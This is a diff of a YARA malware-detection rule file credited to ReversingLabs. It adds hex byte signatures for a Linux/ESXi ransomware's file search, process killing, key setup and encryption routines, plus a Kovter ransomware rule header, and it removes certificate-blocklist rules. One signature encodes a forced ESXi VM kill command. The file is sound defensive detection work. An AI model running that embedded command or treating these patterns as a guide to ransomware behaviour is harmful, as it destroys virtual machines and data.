+            ?? ?? ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 89 C7
+            56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 0F 84 ?? ??
+            ?? ?? 66 83 78 ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 80 7C 05 ??
+            ?? 8D 48 ?? 89 C2 0F 84 ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 80 7C 05 ?? ?? 8D 50 ??
+            75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 66 90 89 C2 85 D2 0F 84 ?? ?? ?? ?? 80 7C
+            15 ?? ?? 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ??
+            31 FF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC ?? 56 8B 5C 24 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 FB BF ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 00 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? BF
+        }
+		$kill_processes_v1_p1 = {
+            55 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 E9 56 53 E8 ?? ?? ?? ?? 81 C3
+            ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 66 89 54 24 ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ??
+            C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 8B 83 ?? ?? ?? ??
+            89 44 24 ?? 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? F3 A5 8D B4 24 ?? ?? ?? ?? C6 44
+        }
+		$kill_processes_v1_p2 = {
+            24 ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 F7 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 CD C7 44 24 ?? ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 89 E8 F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ??
+            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ??
+            ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8
+            B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89
+            34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7
+            8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ??
+            ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 89 34
+            24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D
+            44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ??
+            F3 AB FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3
+        }
+		$shut_down_esxi_v1 = {
+            55 B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 C1 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81
+            EC ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? 65 73 78 63 C7 44 24 ?? 6C 69 20 76 C7 44 24
+            ?? 6D 20 70 72 8D B3 ?? ?? ?? ?? C7 44 24 ?? 6F 63 65 73 F3 A5 8D B4 24 ?? ?? ?? ??
+            C7 44 24 ?? 73 20 6B 69 83 EC ?? 89 F7 C7 44 24 ?? 6C 6C 20 2D C7 44 24 ?? 2D 74 79
+            70 C7 44 24 ?? 65 3D 66 6F C7 44 24 ?? 72 63 65 20 C7 44 24 ?? 2D 2D 77 6F 89 C8 B9
+            ?? ?? ?? ?? C7 44 24 ?? 72 6C 64 2D C7 44 24 ?? 69 64 3D 22 C7 84 24 ?? ?? ?? ?? 25
+            73 22 00 C7 44 24 ?? 5B 45 53 58 C7 44 24 ?? 69 5D 20 53 C7 44 24 ?? 68 75 74 74 C7
+            44 24 ?? 69 6E 67 20 C7 44 24 ?? 64 6F 77 6E F3 AB C7 44 24 ?? 20 2D 20 25 8D 83 ??
+            ?? ?? ?? 66 89 6C 24 ?? C6 44 24 ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 8D 44 24 ?? 66 89 7C 24 ?? 31 FF
+        }
+		$kill_processes_v2_p1 = {
+            41 54 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 E4 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 55 48 89
+            FD 53 48 81 EC ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 48 89 84 24 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F
+            6F 05 ?? ?? 00 00 48 89 DF 66 89 44 24 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 44 24
+            ?? 66 0F 6F 05 ?? ?? 00 00 66 89 54 24 ?? 48 89 EA 0F 29 44 24 ?? 66 0F 6F 05 ?? ??
+            00 00 66 89 8C 24 ?? ?? 00 00 B9 ?? ?? ?? ?? 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? 00 00
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6
+            84 24 ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C7 44 24 ?? ??
+            ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 44 24 ?? ?? 0F 29 84 24
+            ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 B8
+        }
+		$kill_processes_v2_p2 = {
+            48 89 44 24 ?? 4C 89 E0 F3 48 AB 48 89 DF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ??
+            ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ??
+            ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D
+            74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF
+            B9 ?? ?? ?? ?? F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89
+            EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ??
+            F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
+        }
+		$encrypt_files_v2_p1 = {
+            48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 41 57 66 0F EF C0 49 89 FF 41 56 49 89 D6 41 55 49 89
+            F5 BE ?? ?? ?? ?? 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 4C 24 ?? 48
+            8D AC 24 ?? ?? ?? ?? 48 89 DF 4C 89 04 24 0F 29 44 24 ?? 0F 29 44 24 ?? 0F 29 44 24
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 0F 29 44 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75
+            ?? 45 31 E4 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 44 89 E0 5B 5D
+            41 5C 41 5D 41 5E 41 5F C3 0F 1F 80 ?? ?? ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8D 35 ?? ?? ??
+            ?? 4C 89 FF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 89 FF E8 ??
+            ?? ?? ?? 4C 89 FE 4C 89 EF 48 89 C2 49 89 C4 E8 ?? ?? ?? ?? 8B 54 24 ?? 4B 8D 44 25
+            ?? 31 F6 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? BA ?? ?? ?? ?? 43
+            C6 44 25 ?? ?? 4C 8B 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 45 31
+            E4 E8 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
+            8B 7C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8B 7C 24 ?? E8 ?? ??
+            ?? ?? 48 8D 35 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 89 44 24 ?? 49 89 C4 48 85 C0
+        }
+		$encrypt_files_v2_p2 = {
+            0F 84 ?? ?? ?? ?? 31 F6 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24
+            ?? E8 ?? ?? ?? ?? 48 39 44 24 ?? 48 0F 4E 44 24 ?? 48 8D 7C 24 ?? 48 89 C1 48 C1 F9
+            ?? 48 C1 E9 ?? 48 8D 14 08 83 E2 ?? 48 29 CA 48 29 D0 48 89 44 24 ?? E8 ?? ?? ?? ??
+            48 8D BC 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE 48 89 44 24 ?? 31 C0 BA ?? ?? ?? ??
+            F3 48 AB 48 8D 84 24 ?? ?? ?? ?? 48 8B 3C 24 48 89 C1 48 89 44 24 ?? E8 ?? ?? ?? ??
+            41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
+            EE E8 ?? ?? ?? ?? 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 4C 8D 64 24 ?? 48
+            85 C0 75 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 4D 89 F1 4D 89 E8 4C 89 E9 4C 89 E2
+            48 89 EE 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F6 BA ?? ?? ?? ?? 4C 89 FF 48 F7
+            DE E8 ?? ?? ?? ?? 4C 89 F9 4C 89 F2 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44
+            24 ?? 4C 29 F0 48 89 44 24 ?? 74 ?? 49 39 C6 4C 8B 7C 24 ?? BE ?? ?? ?? ?? 4C 89 EF
+            4C 0F 47 F0 66 0F 6F 4C 24 ?? 4C 89 F9 4C 89 F2 0F 29 4C 24 ?? E8 ?? ?? ?? ?? 4C 39
+            F0 74 ?? 48 8B 7C 24 ?? 41 BC ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FE 4C
+            89 EF E8 ?? ?? ?? ?? E9
+        }
+		$find_files_v2_p1 = {
+            41 57 4D 89 C7 41 56 49 89 FE 41 55 49 89 FD 41 54 55 53 89 CB 48 81 EC ?? ?? ?? ??
+            48 89 34 24 89 54 24 ?? 41 8B 55 ?? 49 83 C5 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ??
+            ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 49 8D 55 ?? 4C 0F 44 EA 89 C6
+            40 00 C6 49 83 DD ?? 31 ED 4D 29 F5 74 ?? 49 8D 6D ?? 43 80 7C 2E ?? ?? 49 0F 45 ED
+            48 8D 44 24 ?? 41 89 DC 4C 89 F6 48 89 44 24 ?? 48 89 C2 BF ?? ?? ?? ?? 41 83 E4 ??
+            0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 00 83 F8
+            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? 48 8B 44 24 ?? F6 C3
+            ?? 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C 89 7C 24 ?? 48 89 44 24 ?? 4D
+            85 FF 0F 84 ?? ?? ?? ?? 41 8B 47 ?? 8D 55 ?? 89 54 24 ?? 83 C0 ?? 89 44 24 ?? 89 44
+            24 ?? 41 8B 47 ?? 89 44 24 ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
+            ?? ?? 89 D8 83 E0 ?? 89 44 24 ?? 75 ?? 44 88 5C 24 ?? 44 89 E2 48 8D 4C 24 ?? 4C 89
+            F7 48 8B 74 24 ?? 48 8B 04 24 44 89 44 24 ?? FF D0 44 8B 44 24 ?? 44 0F B6 5C 24 ??
+            85 C0 89 C2 75 ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 54 24 ?? EB ?? 0F
+            1F 44 00 ?? 4D 8B 3F 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 49 39 57 ?? 75 ??
+            31 D2 48 81 C4 ?? ?? ?? ?? 89 D0 5B 5D 41 5C 41 5D 41 5E 41 5F C3 66 90 E8 ?? ?? ??
+            ?? 85 C0 78 ?? 8B 44 24 ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 31 C9 45 31 DB 45 31 E4 48 8B 44 24 ?? F6 C3 ?? 0F 84 ?? ??
+            ?? ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C
+        }
+		$find_files_v2_p2 = {
+            89 7C 24 ?? 48 89 44 24 ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 E8 ?? ?? ??
+            ?? 49 89 C4 8B 00 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 F6 BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? EB
+            ?? 0F 1F 00 8B 4C 24 ?? 85 C9 74 ?? 45 84 DB 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 43 C6 04
+            2E ?? 85 C0 0F 84 ?? ?? ?? ?? 44 89 E2 48 8D 4C 24 ?? 48 8B 74 24 ?? 4C 89 F7 48 8B
+            04 24 FF D0 89 C2 E9 ?? ?? ?? ?? 90 31 F6 4C 89 F7 31 C0 44 88 5C 24 ?? E8 ?? ?? ??
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 44 0F B6 5C 24 ?? 44 8B 00 85 FF 79 ?? 41
+            83 F8 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? ?? ?? 44 0F 45 DA 44 0F 45 E0 8B 74
+            24 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 7C 24 ?? 44 88 5C 24 ?? 44 89 44 24 ?? E8 ?? ?? ??
+            ?? 44 0F B6 5C 24 ?? 44 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 00 48 89 44 24 ?? 48 8B 44
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 85 ED 74 ?? 41 80 3C 2E ?? 48 89 E8 74 ?? E9 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 41 80 3C 06 ?? 0F 85 ?? ?? ?? ?? 48 83 E8 ?? 75 ?? 31 D2 89
+        }
+		$find_files_v2_p3 = {
+            54 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 89 D8 B9 ?? ?? ?? ?? 41 BB ?? ?? ?? ?? 83 E0 ??
+            83 F8 ?? 45 19 E4 41 83 E4 ?? 41 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 54 24 ??
+            85 D2 0F 88 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 49 89 C7 48 85 C0 0F 84 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 44 89 64 24 ?? 4C 29 E8 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 44 24
+            ?? 8B 44 24 ?? 83 E8 ?? 89 44 24 ?? 4C 89 FF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
+            ?? 80 78 ?? ?? 74 ?? 4C 8D 60 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 3B 44 24 ?? 0F 83 ?? ??
+            ?? ?? 41 C6 04 2E ?? 49 8D 7C 2E ?? 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 8B 54 24
+            ?? 89 D9 48 8B 34 24 4C 89 F7 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 FF 89 04 24 E8 ?? ??
+            ?? ?? 8B 14 24 E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 74 ?? 66 83 78 ?? ?? 75 ?? EB ?? 90
+            41 80 7C 06 ?? ?? 48 8D 70 ?? 89 C2 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41
+            80 7C 06 ?? ?? 48 8D 50 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 89 C2 48 85 D2 0F 84
+            ?? ?? ?? ?? 41 80 7C 16 ?? ?? 48 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 00 45 85 E4 0F
+            84 ?? ?? ?? ?? 31 C9 45 31 DB 41 BC ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FF 44 8B 64 24
+            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 41 8B 04 24 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 FF
+            C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 48 89 F2 E9 ?? ?? ?? ?? 44 89 04 24 E8 ?? ?? ?? ?? 44 8B 04 24 BA ?? ?? ??
+            ?? 44 89 00 E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 83 CA ?? E9
+        }
+		$init_key_v2 = {
+            48 85 FF 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 56 41 55 41 54 55 48 89 F5
+            53 48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8D 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ??
+            66 0F EF C0 48 8D 35 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 49 89 E6 0F 29 04 24 0F 29 44
+            24 ?? E8 ?? ?? ?? ?? 49 89 C5 48 85 C0 74 ?? 4C 89 F7 48 89 C1 BA ?? ?? ?? ?? BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F6 4C 89 E7 E8
+            ?? ?? ?? ?? 85 C0 74 ?? 31 C0 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 66 2E
+            0F 1F 84 00 ?? ?? 00 00 31 C0 C3 0F 1F 44 00 ?? 48 89 EA 48 89 DE 4C 89 E7 E8 ?? ??
+            ?? ?? 85 C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 89 E8 EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3-T TOV" and pe.signatures [ i ] . serial == "43:db:44:48:d8:70:d7:bd:c2:75:f3:6a:01:fb:a3:6f" and 1436227199 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $kill_processes_v1_p* ) ) and ( $init_key_v1 ) and ( all of ( $encrypt_files_v1_p* ) ) and ( $shut_down_esxi_v1 ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $kill_processes_v2_p* ) ) and ( $init_key_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2880A7F7Ff2D334Aa08744A8754Fab2C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Kovter : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Kovter ransomware."
 		author = "ReversingLabs"
-		id = "b079b564-9284-59b6-9703-4e33f2b2c44d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9362ac5a-0b6c-5ac5-ac2b-59dcc1191dc6"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1744-L1760"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "03c7e1251c44e8824ae3b648a95cf34f4c56db65d76806306a062a343981d87f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Kovter.yara#L1-L141"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3082e036b54a73ce8397cfa6e8dc2a807c587d9f17286e75af6cdbe622fae1e1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Kovter"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Garena Online Pte Ltd" and pe.signatures [ i ] . serial == "28:80:a7:f7:ff:2d:33:4a:a0:87:44:a8:75:4f:ab:2c" and 1393891199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0492F5C18E26Fa0Cd7E15067674Aff1C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6a176d4a-5d3e-5184-b923-12d561e7034a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1762-L1778"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d47d59d7680000d6c35181be2d9b034c2ecb7ca754a39c8e11750ddd7246b47c"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghada Saffarini" and pe.signatures [ i ] . serial == "04:92:f5:c1:8e:26:fa:0c:d7:e1:50:67:67:4a:ff:1c" and 1445990399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6Aa668Cd6A9De1Fdd476Ea8225326937 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "bfff2210-8545-594d-8674-243e57e3dd09"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1780-L1796"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "706e16995af40a6c9176dcbca07fb406f2efe4d47dbd9629d1a6b1ab1d09b045"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BSCP LIMITED" and pe.signatures [ i ] . serial == "6a:a6:68:cd:6a:9d:e1:fd:d4:76:ea:82:25:32:69:37" and 1441583999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1Cb06Dccb482255728671Ea12Ac41620 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "5a7f61a4-15ba-5f5c-89e1-b8b986e13f19"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1798-L1814"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e0867ffe2ddd28282fe78b27b3b12ebac525b33a27dd242bc6f55bcd2e066a18"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
